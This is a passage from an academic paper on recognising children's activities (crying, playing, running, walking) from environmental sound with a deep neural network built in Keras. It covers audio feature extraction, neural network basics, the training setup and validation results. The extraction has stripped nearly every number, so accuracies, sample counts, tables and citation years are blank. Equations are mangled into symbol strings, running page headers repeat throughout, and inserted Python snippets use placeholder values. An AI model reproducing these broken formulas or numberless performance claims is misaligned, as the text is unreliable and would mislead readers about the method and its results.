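        librosa.feature.mfcc(y=y, sr=sr, n_mfcc=n_mfcc),  # MFCCs
        librosa.feature.chroma_stft(y=y, sr=sr),          # chroma vector
    ]
    # Average every feature over the frames of the clip and stack into one vector.
    return np.concatenate([f.mean(axis=1) for f in frame_features])

vector = clip_features("crying_0001.wav")  # hypothetical file name
print(vector.shape)
```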
this set of features was extracted using the python programming language (van rossum, ). the complete feature set (table: extracted features) is:

- zero crossing rate
- energy
- entropy of energy
- spectral centroid
- spectral spread
- spectral entropy
- spectral flux
- spectral rolloff
- mfccs
- chroma vector
- chroma deviation

artificial neural networks

an ann is a model based on the neural structure of the brain, which basically learns from experience. this type of model learns to perform tasks from sample data, without needing to be programmed for a specific task. an ann is composed of nodes, called neurons, connected to each other. each of these connections, called edges, is a channel that can transmit information from one neuron to another (monteiro et al., ). each edge is usually associated with a real number, called a weight, which increases or decreases the signal that passes through it and thereby the input to the next neuron. the output of a neuron is calculated by some non-linear function of the sum of its inputs. in fig. the parts of an artificial neuron are shown: the inputs are represented by xi and the weights associated with each edge by wi; the transfer and activation functions with which the output is calculated are also represented inside the neuron.
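a minimal numpy illustration of the neuron just described follows; the inputs, weights, bias and the choice of relu as the activation are placeholders rather than values from the paper.

```python
import numpy as np

def neuron_output(x, w, b, activation=lambda s: max(0.0, s)):
    """One artificial neuron: weighted sum of the inputs plus a bias, then an activation."""
    s = np.dot(w, x) + b   # transfer value: sum_i w_i * x_i + b
    return activation(s)   # non-linear activation applied to the transfer value

x = np.array([0.2, 0.7, 0.1])    # inputs x_i
w = np.array([0.5, -0.3, 0.8])   # weights w_i
print(neuron_output(x, w, b=0.1))
```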
one way to select the parameters of ann, such as the number of nodes and hidden layers, has been to adjust them manually or relying on very deep networks (simonyan & zisserman, ) that have proved effective in other applications, with the disadvantage of the cost in memory that it implies that the ann is not optimized for the particular problem and some of these parameters can be redundant (alvarez & salzmann, ). neural network model an ann model is composed by four mainly concepts described in detail below. type of model when using the keras interface for the implementation of an ann in python, it is necessary to specify the type of model to be created. there are two ways to define keras models: sequential and functional (ketkar, ). a sequential model refers to the fact that the output of each layer is taken as the input of the next layer, and it is the type of model developed in this work. activation function the activation function is responsible for returning an output from an input value, usually the set of output values in a given range such as ( , ) or (− , ). the types of activation functions most commonly used in ann are: � sigmoid: this function transforms the values entered to a scale ( , ), where high values tend asymptotically to and very low values tend asymptotically to (karlik & olgac, ), as shown in eq. ( ). f ðxÞ ¼ � e�x ( ) � relu-rectified linear unit: this function transforms the entered values by canceling the negative values and leaving the positive ones as they enter (yarotsky, ), as shown in eq. ( ). f ðxÞ ¼ maxð ; xÞ ¼ � for x , x for x � � ( ) � softmax: this function transforms the outputs into a representation in the form of probabilities, such that the sum of all the probabilities of the outputs is . it is used to normalize multiclass type (liu et al., ), as shown in eq. ( ). garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ f ðzÞj ¼ ezjpk k¼ e zk ( ) optimization algorithm the goal of optimization algorithms is to minimize (or maximize) an objective e(x) function that is simply a mathematical function that depends on the internal learning parameters of the model that are used to calculate the objective (y) values of the set of predictors (x) used in the model. the most commonly used optimization algorithms in ann are gradient descent and adam (ruder, ; kingma & ba, ). loss function the loss function, also known as the cost function, is the function that indicates how good the ann is. a high result indicates that the ann has poor performance and a low result indicates that the ann is performing positively. this is the function that is optimized or minimized when back propagation is performed. there are several mathematical functions that can be used, the choice of one depends on the problem that is being solved. some of these functions are: � cross-entropy: cross-entropy loss, or log loss, measures the performance of a classification model whose output, y, is a probability value, p, between and , and it is calculated with eq. ( ). cross-entropy loss increases as the predicted probability diverges from the actual label. this function is used for classification problems (rubinstein & kroese, ). �ðy logðpÞ þ ð � yÞ logð � pÞÞ ( ) � categorical cross-entropy: also called softmax loss (koidl, ). it is a softmax activation plus a cross-entropy loss and it is calculated with eq. 
( ), where the double sum is over the observations i, whose number is n, and the categories c, whose number is c. the term yi ∈ cc is the indicator function of the ith observation belonging to the cth category. the pmodel[yi ∈ cc] is the probability predicted by the model for the ith observation to belong to the cth category. when there are more than two categories, the ann outputs a vector of c probabilities, each giving the probability that the network input should be classified as belonging to the respective category. when the number of categories is just two, the neural network outputs a single probability ŷi, with the other one being minus the output. this is why the binary cross entropy looks a bit different from categorical cross entropy, despite being a special case of it. � n xn i¼ xc c¼ yi cc log pmodel yi cc½ � ( ) � mean squared error: mean square error (mse) is the most commonly used regression loss function (christoffersen & jacobs, ). mse is the sum of squared distances garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between our target variable and predicted values, and it is calculated with eq. ( ), where n represents the number of samples and ŷi represents the predicted value. mse ¼ pn i¼ ðyi � ŷiÞ n ( ) experiments and results the dataset used in this work is contained by , -s audio samples, with extracted features from each sample. two validation approaches were used: – split and a k-fold cross validation. for the – split approach, a training subset and a testing subset are randomly selected, contained by % and % of the data, respectively (the approach of % for training and % for testing is used in this area as valid, as proposed by balli, sağbaș & peker ( ), taylor et al. ( ) and sousa lima et al. ( )). table shows the number of audio samples in each subset for this case. for the k-fold cross-validation, k = was selected, since it is an approach used in works on human activity recognition to estimate an average accuracy and evaluate the model performance, as in the works presented by altun & barshan ( ), dehghani, glatard & shihab ( ), and jordao et al. ( ). table shows the number of audio samples in the training and test subsets using the -fold cross-validation approach. the ann architecture is the most important aspect to define, since it directly impacts the accuracy achieved by the network. as mentioned earlier, there are no rules to choose the parameters of the architecture since these are conditioned to the type of application that is given to the ann and they are determined by trial and error. table shows the proposed architecture of the deep ann used in this work. the selected parameters for the ann architecture, as well as the characteristics of the dataset (classes balanced in quantity, proportion of the size of the testing and training subsets, number of features), ensure that no overfitting appears for the generated model, based on the obtained results, so no dropout layers were used. in table the selected parameters for the development and implementation of the model in the keras interface with python are presented. 
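as an illustration of how such a sequential model can be assembled in keras, the sketch below uses placeholder values for the number of hidden layers, the neurons per layer, the number of epochs, the batch size and the feature-vector length (the actual values are those given in the tables above); only the relu and softmax activations, the categorical cross-entropy loss and the adam optimizer are taken from the text.

```python
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense

n_features = 34   # placeholder: length of the extracted feature vector
n_classes = 4     # crying, playing, running, walking

model = Sequential([
    Dense(128, activation="relu", input_shape=(n_features,)),  # first hidden layer
    Dense(64, activation="relu"),                               # further hidden layers (ReLU)
    Dense(n_classes, activation="softmax"),                     # output layer, one node per class
])

model.compile(optimizer="adam",                  # Adam with Keras default parameters
              loss="categorical_crossentropy",   # categorical cross-entropy loss
              metrics=["accuracy"])

# Hold-out training in the spirit of the split approach; X_* are feature matrices
# and y_* one-hot encoded labels (placeholder epoch and batch-size values).
# history = model.fit(X_train, y_train, epochs=100, batch_size=32,
#                     validation_data=(X_test, y_test))
```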
for the choice of the used parameters in the model implementation, those that best adapt to the type of problem in which they are being applied (multiclass classification) were taken and some of them are present by default in the keras interface, considering that they are generally the ones that achieve the best performing (e.g., the relu activation function is the most successful and widely used activation function (ramachandran, zoph & le, )). the ann model created with the described architecture and parameters was implemented, executed and validated in the python programming language. as mentioned above, two validation approaches were used to evaluate the performance of the model. for the – split approach, fig. shows the accuracy achieved by the model over epochs, where can be observed that the accuracy achieved for the classification of children’s activities using environmental sound is . for training data and . for testing data. garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in fig. it can be observed that the curves representing the model accuracy (training and testing accuracy) periodically spikes down, which is a consequence of the training process being stuck in local regions, due to the optimization parameters used (the adam table size of training and test data sets for the – validation approach. total samples training data samples test data samples , , table size of training and test data sets for the -fold cross-validation approach. total samples training data samples test data samples , , table proposed ann architecture. inputs hidden layers neurons per layer outputs batch size epochs table selected model parameters. type of model sequential input layer activation function relu hidden layers activation function relu output layer activation function softmax loss function categorical crossentropy optimization algorithm adam figure accuracy behavior during ann training and testing for the – split approach. full-size doi: . /peerj-cs. /fig- garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimization function was used, with the default parameters (keras team, ). figure shows the loss presented by the ann, where can be observed that the loss for the training data is . , while for the testing data is . , which is related to the general evaluation of the ann and indicates how good it is for the classification. in fig. it can be observed that the curves representing the model loss (training and testing loss) present irregular spikes, which is due properly to the shape of the analyzed data and the parameters chosen in the network architecture, specifically the adam optimization function, as mentioned above. from the results obtained by executing the classification model with the – split approach, it is also possible to analyze the behavior of the model specifically for each of the activities analyzed in this work. table shows the confusion matrix generated from the execution of the classification model for the testing data. in the confusion matrix it is possible to observe the number of correctly classified audio samples for each activity and the number of wrongly classified samples. for the set of activities analyzed, the crying activity is the one that the model classifies in the best way, with . % accuracy ( of samples correctly classified). 
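the per-class behaviour summarised by the confusion matrix could be reproduced with scikit-learn once the trained model's predictions on the test clips are available; the variable names and the toy label arrays below are illustrative only.

```python
import numpy as np
from sklearn.metrics import confusion_matrix, classification_report

labels = ["cry", "play", "run", "walk"]

# y_true holds the reference classes of the test clips and y_pred the classes chosen
# by the model (argmax over the softmax outputs), both encoded as label indices, e.g.:
# y_pred = np.argmax(model.predict(X_test), axis=1)
y_true = np.array([0, 0, 1, 2, 3, 3])   # toy example
y_pred = np.array([0, 0, 1, 2, 3, 2])

cm = confusion_matrix(y_true, y_pred)
per_class_accuracy = cm.diagonal() / cm.sum(axis=1)   # per-activity recall

print(cm)
print(dict(zip(labels, per_class_accuracy)))
print(classification_report(y_true, y_pred, target_names=labels))
```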
for the second model validation approach, the -fold cross-validation, table shows the accuracy and loss obtained for each fold and table shows the average scores for all figure loss function behavior during ann training and validation. full-size doi: . /peerj-cs. /fig- table confusion matrix for the activity classification model. cry play run walk cry play run walk garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ folds. in both validation processes of the child activity classification model ( – division approach and -fold cross-validation) it can be observed that the accuracy is very similar. discussion although the substantial contribution of the present work is the presentation of a deep artificial neural network in the generation of a children activity classification model through environmental sound, there are aspects to be considered, such as the fact that the proposed architecture is specific for this model and is susceptible to being optimized. the activities are independent of each other, that is, the analysis does not consider activities that are performed simultaneously. composite activities would thus require a different analysis to be considered. another important point is the type of environmental sound with which one works, since this work is based on the fact that the captured audio corresponds to activities performed in environments with little or no external noise, and where only one individual (child) is performing an activity at the same time. environments with considerable external noise or with several individuals (children) interacting at the same time would require another type of analysis. it is also important to highlight that the results obtained in terms of accuracy for the two model validation approaches implemented in this work are similar, which confirms the performance of the model in the children activity classification using environmental sound. table scores per fold in the -fold cross-validation approach. fold accuracy (%) loss . . . . . . . . . . . . . . . . . . . . table average scores for all folds in the -fold cross-validation approach. accuracy (%) loss . . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions the aim of the present work was to create a children activity classification model using environmental sound as data source, through the design of a deep ann, a well-known machine learning technique through which it is possible to generate activity recognition models, with significant accuracy. from the results shown in “experiments and results”, the following conclusions can be obtained: � environmental sound can be used to correctly classify children activities. environmental sound is an effective data source for the generation of models for children activity classification, since it is possible to classify activities based on the analysis of the extracted features from the environmental sound. � different-type activities are correctly classified. the model correctly classifies activities of different types such as crying, playing, running and walking, unlike other models based on specific types of sensors (e.g., using accelerometers only for activities detectable by movement). � deep artificial neural networks are efficient in generating children activity classification models through environmental sound. 
the deep artificial neural network with the proposed architecture correctly classifies children activities with an accuracy of %, through the analysis of the extracted features from the environmental sound. � the accuracy of the deep artificial neural network is similar to other machine learning techniques reported. the deep artificial neural network with the architecture proposed in the present work achieves an accuracy similar to that reported in our previous works, with other machine learning techniques: % for knn with features (blanco- murillo et al., ) and . % for knn with features (garca-domnguez et al., ). future work the present work allows us to demonstrate that a deep artificial neural network is an efficient technique in the generation of a children activity classification model, however, some aspects can be worked on in the future. therefore, we propose as part of future work the analysis of the parameters described in the architecture of the neural network, as well as the consideration of feature selection techniques for the dataset. as for the set of activities analyzed, we also propose as future work the addition of more simple activities, as well as the proposal for the analysis of compound activities, both in controlled and uncontrolled environments. the proposed future work is: � to analyze the parameters described in the architecture of the proposed deep artificial neural network with the aim of performing an optimization that allows increasing the accuracy in the classification of the activities. � to include feature selection techniques to reduce the size of the dataset with which the deep artificial neural network works and this can favorably impact the performance garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the model. this is important especially when working with models that are implemented in mobile devices with limited resources. � to analyze the dataset size and the number of instances per class to ensure optimal training of the model and expand it if necessary. � to increase the set of activities analyzed by adding additional activities that are performed by children, which will allow the model to be more robust. � to propose the type of analysis to be performed in the case of compound activities. � to analyze the methods and techniques to be used to classify children activities through environmental sound in uncontrolled environments with outside noise. � to design a practical application on a specific scenario where the generated classification model can be applied considering the points to work mentioned above. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � antonio garcía-domínguez conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � carlos e. galvan-tejada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � laura a. zanella-calzada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. 
� hamurabi gamboa performed the experiments, analyzed the data, prepared figures and/ or tables, and approved the final draft. � jorge i. galván-tejada analyzed the data, prepared figures and/or tables, and approved the final draft. � josé maría celaya padilla analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. � huizilopoztli luna-garcía performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � jose g. arceo-olague performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � rafael magallanes-quintanar performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: raw data are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abadi m, barham p, chen j, chen z, davis a, dean j, devin m, ghemawat s, irving g, isard m, kudlur m, levenberg j, monga r, moore s, murray dg, steiner b, tucker p, vasudevan v, warden p, wicke m, yu y, zheng x, brain g. . tensorflow: a system for large-scale machine learning. in: th usenix symposium on operating systems design and implementation (osdi ), – . al nuaimi e, al neyadi h, mohamed n, al-jaroodi j. . applications of big data to smart cities. journal of internet services and applications ( ): doi . /s - - - . alahi a, goel k, ramanathan v, robicquet a, fei-fei l, savarese s. . social lstm: human trajectory prediction in crowded spaces. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . albino v, berardi u, dangelico rm. . smart cities: definitions, dimensions, performance, and initiatives. journal of urban technology ( ): – doi . / . . . altun k, barshan b. . human activity recognition using inertial/magnetic sensor units. in: international workshop on human behavior understanding, springer, – . alvarez jm, salzmann m. . learning the number of neurons in deep networks. in: advances in neural information processing systems, – . arasteh h, hosseinnezhad v, loia v, tommasetti a, troisi o, shafie-khah m, siano p. . iot-based smart cities: a survey. in: ieee th international conference on environment and electrical engineering (eeeic). piscataway: ieee, – . aron j. . how innovative is apple’s new voice assistant, siri? new scientist. ( ): . balli s, sağbaș ea, peker m. . human activity recognition from smart watch sensor data using a hybrid of principal component analysis and random forest algorithm. measurement and control ( – ): – . barbedo jga. . impact of dataset size and variety on the effectiveness of deep learning and transfer learning for plant disease classification. computers and electronics in agriculture : – doi . /j.compag. . . . bhat hr, lone ta, paul zm. . cortana-intelligent personal digital assistant: a review. international journal of advanced research in computer science ( ): – . blanco-murillo dm, garcía-domínguez a, galván-tejada ce, celaya-padilla jm. . 
comparación del nivel de precisión de los clasificadores support vector machines, k nearest neighbors, random forests, extra trees y gradient boosting en el reconocimiento de actividades infantiles utilizando sonido ambiental. research in computing science ( ): – doi . /rcs- - - . blasco r, marco Á, casas r, cirujano d, picking r. . a smart kitchen for ambient assisted living. sensors ( ): – doi . /s . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.compag. . . http://dx.doi.org/ . /rcs- - - http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ boufama b, habashi p, ahmad is. . trajectory-based human activity recognition from videos. in: international conference on advanced technologies for signal and image processing (atsip). piscataway: ieee, – . boughorbel s, breebaart j, bruekers f, flinsenberg i, kate wt. . child-activity recognition from multi-sensor data. in: proceedings of the th international conference on methods and techniques in behavioral research-mb . brophy e, muehlhausen w, smeaton af, ward te. . optimised convolutional neural networks for heart rate estimation and human activity recognition in wrist worn sensing applications. arxiv. available at https://arxiv.org/abs/ . . burbano d, carrera jl. . human activity recognition in a car with embedded devices. latin american journal of computing faculty of systems engineering escuela politécnica nacional quito-ecuador ( ): – . caba heilbron f, escorcia v, ghanem b, carlos niebles j. . activitynet: a large-scale video benchmark for human activity understanding. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . capela na, lemaire ed, baddour n. . feature selection for wearable smartphone-based human activity recognition with able bodied, elderly, and stroke patients. plos one ( ): e doi . /journal.pone. . chen z, zhu q, soh yc, zhang l. . robust human activity recognition using smartphone sensors via ct-pca and online svm. ieee transactions on industrial informatics ( ): – doi . /tii. . . chollet f. . keras: the python deep learning library. houghton: astrophysics source code library. christoffersen p, jacobs k. . the importance of the loss function in option valuation. journal of financial economics ( ): – doi . /j.jfineco. . . . cippitelli e, gasparrini s, gambi e, spinsante s. . a human activity recognition system using skeleton data from rgbd sensors. computational intelligence and neuroscience : . concone f, re gl, morana m. . a fog-based application for human activity recognition using personal smart devices. acm transactions on internet technology (toit) ( ): – doi . / . cook dj, augusto jc, jakkula vr. . ambient intelligence: technologies, applications, and opportunities. pervasive and mobile computing ( ): – doi . /j.pmcj. . . . corno f, de russis l. . training engineers for the ambient intelligence challenge. ieee transactions on education ( ): – doi . /te. . . cristani m, karafili e, tomazzoli c. . improving energy saving techniques by ambient intelligence scheduling. in: ieee th international conference on advanced information networking and applications. piscataway: ieee, – . de la concepción mÁÁ, morillo lms, garca jaÁ, gonzález-abril l. . 
mobile activity recognition and fall detection system for elderly people using ameva algorithm. pervasive and mobile computing : – doi . /j.pmcj. . . . dehghani a, glatard t, shihab e. . subject cross validation in human activity recognition. arxiv. available at http://arxiv.org/abs/ . . delgado-contreras jr, garća-vázquez jp, brena rf, galván-tejada ce, galván-tejada ji. . feature selection for place classification through environmental sounds. procedia computer science : – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /j.jfineco. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.pmcj. . . http://dx.doi.org/ . /te. . http://dx.doi.org/ . /j.pmcj. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dutta s, gros e. . evaluation of the impact of deep learning architectural components selection and dataset size on a medical imaging task. in: medical imaging : imaging informatics for healthcare, research, and applications, international society for optics and photonics, : . fatima m, pasha m. . survey of machine learning algorithms for disease diagnostic. journal of intelligent learning systems and applications ( ): – doi . /jilsa. . . galván-tejada ce, galván-tejada ji, celaya-padilla jm, delgado-contreras jr, magallanes-quintanar r, martinez-fierro ml, garza-veloz i, lópez-hernández y, gamboa-rosales h. . an analysis of audio features to develop a human activity recognition model using genetic algorithms, random forests, and neural networks. mobile information systems : doi . / / . garca-dominguez a, galván-tejada ce, zanella-calzada la, gamboa-rosales h, galván-tejada ji, celaya-padilla jm, luna-garca h, magallanes-quintanar r. . feature selection using genetic algorithms for the generation of a recognition and classification of children activities model using environmental sound. mobile information systems : doi . / / . garca-domnguez a, zanella-calzada la, galván-tejada ce, galván-tejada ji, celaya-padilla jm. . evaluation of five classifiers for children activity recognition with sound as information source and akaike criterion for feature selection. in: mexican conference on pattern recognition, berlin: springer, – . gupta a, pandey oj, shukla m, dadhich a, ingle a, gawande p. . towards context-aware smart mechatronics networks: integrating swarm intelligence and ambient intelligence. in: international conference on issues and challenges in intelligent computing techniques (icict). piscataway: ieee, – . hammerla ny, halloran s, plötz t. . deep, convolutional, and recurrent models for human activity recognition using wearables. available at https://arxiv.org/abs/ . . hassan mm, uddin mz, mohamed a, almogren a. . a robust human activity recognition system using smartphone sensors and deep learning. future generation computer systems : – doi . /j.future. . . . hershey s, chaudhuri s, ellis dp, gemmeke jf, jansen a, moore rc, plakal m, platt d, saurous ra, seybold b, slaney m, weiss rj, wilson k. . cnn architectures for large-scale audio classification. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . hoy mb. . alexa, siri, cortana, and more: an introduction to voice assistants. medical reference services quarterly ( ): – doi . / . . . hu l, ni q. . iot-driven automated object detection algorithm for urban surveillance systems in smart cities. 
ieee internet of things journal ( ): – doi . /jiot. . . ignatov a. . real-time human activity recognition from accelerometer data using convolutional neural networks. applied soft computing : – doi . /j.asoc. . . . jiang w, yin z. . human activity recognition using wearable sensors by deep convolutional neural networks. in: proceedings of the rd acm international conference on multimedia. new york: acm, – . jordan mi, mitchell tm. . machine learning: trends, perspectives, and prospects. science ( ): – doi . /science.aaa . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jilsa. . http://dx.doi.org/ . / / http://dx.doi.org/ . / / https://arxiv.org/abs/ . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /science.aaa http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jordao a, nazare ac jr, sena j, schwartz wr. . human activity recognition based on wearable sensor data: a standardization of the state-of-the-art. arxiv. available at https://arxiv.org/abs/ . . karlik b, olgac av. . performance analysis of various activation functions in generalized mlp architectures of neural networks. international journal of artificial intelligence and expert systems ( ): – . kepuska v, bohouta g. . next-generation of virtual personal assistants (microsoft cortana, apple siri, amazon alexa and google home). in: ieee th annual computing and communication workshop and conference (ccwc). piscataway: ieee, – . keras team. . keras documentation: adam. available at https://keras.io/api/optimizers/adam/ (accessed september ). ketkar n. . introduction to keras. in: deep learning with python. berlin: springer, – . kia mb, pirasteh s, pradhan b, mahmud ar, sulaiman wna, moradi a. . an artificial neural network model for flood simulation using gis: johor river basin, malaysia. environmental earth sciences ( ): – doi . /s - - -z. kingma dp, ba j. . adam: a method for stochastic optimization. arxiv. available at https://arxiv.org/abs/ . . koidl k. . loss functions in classification tasks. dublin: school of computer science and statistic trinity college. kurashima s, suzuki s. . improvement of activity recognition for child growth monitoring system at kindergarten. in: iecon - st annual conference of the ieee industrial electronics society. piscataway: ieee, – . lee s-m, yoon sm, cho h. . human activity recognition from accelerometer data using convolutional neural network. in: ieee international conference on big data and smart computing (bigcomp). piscataway: ieee, – . li s, da xu l, zhao s. . the internet of things: a survey. information systems frontiers ( ): – doi . /s - - - . li x, zhang y, marsic i, sarcevic a, burd rs. . deep learning for rfid-based activity recognition. in: proceedings of the th acm conference on embedded network sensor systems cd-rom. new york: acm, – . liang d, thomaz e. . audio-based activities of daily living (adl) recognition with large-scale acoustic embeddings from online videos. proceedings of the acm on interactive, mobile, wearable and ubiquitous technologies ( ): – doi . / . liu w, wen y, yu z, yang m. . large-margin softmax loss for convolutional neural networks. icml : . lloret j, canovas a, sendra s, parra l. . a smart communication architecture for ambient assisted living. ieee communications magazine ( ): – doi . /mcom. . . lópez g, quesada l, guerrero la. . alexa vs. siri vs. cortana vs. 
google assistant: a comparison of speech-based natural user interfaces. in: international conference on applied human factors and ergonomics, berlin: springer, – . lu h, zhang h, nayak a. . a deep neural network for audio classification with a classifier attention mechanism. arxiv. available at https://arxiv.org/abs/ . . lubina p, rudzki m. . artificial neural networks in accelerometer-based human activity recognition. in: nd international conference mixed design of integrated circuits & systems (mixdes). piscataway: ieee, – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://keras.io/api/optimizers/adam/ http://dx.doi.org/ . /s - - -z https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /mcom. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lyu l, he x, law yw, palaniswami m. . privacy-preserving collaborative deep learning with application to human activity recognition. in: proceedings of the acm on conference on information and knowledge management. new york: acm, – . mannini a, rosenberger m, haskell wl, sabatini am, intille ss. . activity recognition in youth using single accelerometer placed at wrist or ankle. medicine and science in sports and exercise ( ): – doi . /mss. . mascia m, canclini a, antonacci f, tagliasacchi m, sarti a, tubaro s. . forensic and anti- forensic analysis of indoor/outdoor classifiers based on acoustic clues. in: rd european signal processing conference (eusipco). memon m, wagner sr, pedersen cf, beevi fha, hansen fo. . ambient assisted living healthcare frameworks, platforms, standards, and quality attributes. sensors ( ): – doi . /s . monteiro j, granada r, barros rc, meneguzzi f. . deep neural networks for kitchen activity recognition. in: international joint conference on neural networks (ijcnn). murad a, pyun j-y. . deep recurrent neural networks for human activity recognition. sensors ( ): doi . /s . myo ww, wettayaprasit w, aiyarak p. . designing classifier for human activity recognition using artificial neural network. in: ieee th international conference on computer and communication systems (icccs). piscataway: ieee, – . nikam ss. . a comparative study of classification techniques in data mining algorithms. oriental journal of computer science & technology ( ): – . nweke hf, teh yw, al-garadi ma, alo ur. . deep learning algorithms for human activity recognition using mobile and wearable sensor networks: state of the art and research challenges. expert systems with applications : – doi . /j.eswa. . . . oyedare t, park j-mj. . estimating the required training dataset size for transmitter classification using deep learning. in: ieee international symposium on dynamic spectrum access networks (dyspan). piscataway: ieee, – . paul p, george t. . an effective approach for human activity recognition on smartphone. in: ieee international conference on engineering and technology (icetech). piscataway: ieee, – . piczak kj. . environmental sound classification with convolutional neural networks. in: ieee th international workshop on machine learning for signal processing (mlsp). piscataway: ieee, – . rafferty j, nugent cd, liu j, chen l. . from activity recognition to intention recognition for assisted living within smart homes. ieee transactions on human-machine systems ( ): – doi . /thms. . . ramachandran p, zoph b, le qv. . searching for activation functions. arxiv. available at https://arxiv.org/abs/ . . 
reyes-ortiz j-l, oneto l, samà a, parra x, anguita d. . transition-aware human activity recognition using smartphones. neurocomputing : – doi . /j.neucom. . . . robinson dc, sanders da, mazharsolook e. . ambient intelligence for optimal manufacturing and energy efficiency. assembly automation ( ): – doi . /aa- - - . roda c, rodrguez ac, lópez-jaquero v, navarro e, gonzález p. . a multi-agent system for acquired brain injury rehabilitation in ambient intelligence environments. neurocomputing : – doi . /j.neucom. . . . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /mss. http://dx.doi.org/ . /s http://dx.doi.org/ . /s http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /thms. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /aa- - - http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ronao ca, cho s-b. . human activity recognition with smartphone sensors using deep learning neural networks. expert systems with applications : – doi . /j.eswa. . . . rong f. . audio classification method based on machine learning. in: international conference on intelligent transportation, big data & smart city (icitbs). piscataway: ieee, – . rubinstein ry, kroese dp. . the cross-entropy method: a unified approach to combinatorial optimization, monte-carlo simulation and machine learning. berlin: springer science & business media. ruder s. . an overview of gradient descent optimization algorithms. arxiv. available at https://arxiv.org/abs/ . . scheirer ed. . tempo and beat analysis of acoustic musical signals. journal of the acoustical society of america ( ): – doi . / . . sebestyen g, stoica i, hangan a. . human activity recognition and monitoring for elderly people. in: ieee th international conference on intelligent computer communication and processing (iccp). piscataway: ieee, – . shoaib m, bosch s, incel od, scholten h, havinga pj. . a survey of online activity recognition using mobile phones. sensors ( ): – doi . /s . sim jm, lee y, kwon o. . acoustic sensor based recognition of human activity in everyday life for smart home services. international journal of distributed sensor networks ( ): doi . / / . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv. available at https://arxiv.org/abs/ . . sousa lima w, souto e, el-khatib k, jalali r, gama j. . human activity recognition using inertial sensors in a smartphone: an overview. sensors ( ): doi . /s . stipanicev d, bodrozic l, stula m. . environmental intelligence based on advanced sensor networks. in: th international workshop on systems, signals and image processing and th eurasip conference focused on speech and image processing, multimedia communications and services. piscataway: ieee, – . stork ja, spinello l, silva j, arras ko. . audio-based human activity recognition using non-markovian ensemble voting. in: ieee ro-man: the st ieee international symposium on robot and human interactive communication. piscataway: ieee. suto j, oniga s. . efficiency investigation of artificial neural networks in human activity recognition. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . tarzia sp, dinda pa, dick rp, memik g. . indoor localization without infrastructure using the acoustic background spectrum. in: proceedings of the th international conference on mobile systems, applications, and services, – . 
